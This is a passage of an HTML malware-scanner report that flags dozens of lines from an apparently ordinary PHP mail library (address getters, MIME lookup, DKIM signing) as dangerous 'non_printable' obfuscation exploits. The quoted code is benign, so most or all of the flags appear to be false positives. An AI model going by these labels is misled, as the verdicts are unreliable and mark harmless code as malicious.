<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCustomHeaders</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3663</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">CustomHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3680</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string $message The transformed message Body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3682</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">msgHTML</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$basedir </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3695</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$data</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3753</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">Body</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">used a bundled advanced converter</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3766</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$html</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3768</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$converter</span><span style="color: #007700">-></span><span style="color: #0000BB">get_text</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3776</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">html2text</span><span style="color: #007700">(</span><span style="color: #0000BB">$html</span><span style="color: #007700">, </span><span style="color: #0000BB">$advanced </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3779</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$advanced</span><span style="color: #007700">, </span><span style="color: #0000BB">$html</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3781</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">html_entity_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string MIME type of file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3795</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3898</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$mimes</span><span style="color: #007700">[</span><span style="color: #0000BB">strtolower</span><span style="color: #007700">(</span><span style="color: #0000BB">$ext</span><span style="color: #007700">)];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3900</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">'application/octet-stream'</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3910</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">filenameToType</span><span style="color: #007700">(</span><span style="color: #0000BB">$filename</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3918</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">_mime_types</span><span style="color: #007700">(</span><span style="color: #0000BB">$pathinfo</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3925</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #0000BB">pathinfo</span><span style="color: #007700">.</span><span style="color: #0000BB">php</span><span style="color: #FF8000">#107461</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3928</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">only the specified piece</span><span style="color: #007700">, </span><span style="color: #0000BB">allows </span><span style="color: #DD0000">'filename' </span><span style="color: #0000BB">to work on PHP </span><span style="color: #007700">< </span><span style="color: #0000BB">5.2</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3929</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string</span><span style="color: #007700">|array</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3932</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mb_pathinfo</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">, </span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3953</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'dirname'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3956</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'basename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3959</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'extension'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3962</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">[</span><span style="color: #DD0000">'filename'</span><span style="color: #007700">];</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3964</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$ret</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3970</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function - </span><span style="color: #0000BB">it</span><span style="color: #DD0000">'s more verbose, less efficient, more error-prone and</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3982</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">set</span><span style="color: #007700">(</span><span style="color: #0000BB">$name</span><span style="color: #007700">, </span><span style="color: #0000BB">$value </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 3999</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4001</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">trim</span><span style="color: #007700">(</span><span style="color: #0000BB">str_replace</span><span style="color: #007700">(array(</span><span style="color: #DD0000">"\r"</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n"</span><span style="color: #007700">), </span><span style="color: #DD0000">''</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4014</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">normalizeBreaks</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype </span><span style="color: #007700">= </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4016</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">preg_replace</span><span style="color: #007700">(</span><span style="color: #DD0000">'/(\r\n|\r|\n)/ms'</span><span style="color: #007700">, </span><span style="color: #0000BB">$breaktype</span><span style="color: #007700">, </span><span style="color: #0000BB">$text</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4027</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$cert_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_filename</span><span style="color: #007700">, </span><span style="color: #0000BB">$key_pass</span><span style="color: #007700">, </span><span style="color: #0000BB">$extracerts_filename </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4041</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_QP</span><span style="color: #007700">(</span><span style="color: #0000BB">$txt</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4052</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$line</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4060</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The DKIM signature value</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4062</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Sign</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4082</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">base64_encode</span><span style="color: #007700">(</span><span style="color: #0000BB">$signature</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4108</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_HeaderC</span><span style="color: #007700">(</span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$signHeader</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4128</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_BodyC</span><span style="color: #007700">(</span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4131</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">DKIM_Add</span><span style="color: #007700">(</span><span style="color: #0000BB">$headers_line</span><span style="color: #007700">, </span><span style="color: #0000BB">$subject</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4220</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$dkimhdrs </span><span style="color: #007700">. </span><span style="color: #0000BB">$signed </span><span style="color: #007700">. </span><span style="color: #DD0000">"\r\n"</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4229</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">hasLineLongerThanMax</span><span style="color: #007700">(</span><span style="color: #0000BB">$str</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4232</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'/^(.{'</span><span style="color: #007700">.(</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">MAX_LINE_LENGTH </span><span style="color: #007700">+ </span><span style="color: #0000BB">2</span><span style="color: #007700">).</span><span style="color: #DD0000">',})/m'</span><span style="color: #007700">, </span><span style="color: #0000BB">$str</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4241</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4243</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">to</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4252</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getCcAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4254</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">cc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4263</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getBccAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4265</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">bcc</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4274</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getReplyToAddresses</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4276</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">ReplyTo</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 4285</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getAllRecipientAddresses</span><span style="color: #007700">()</span>
</span>
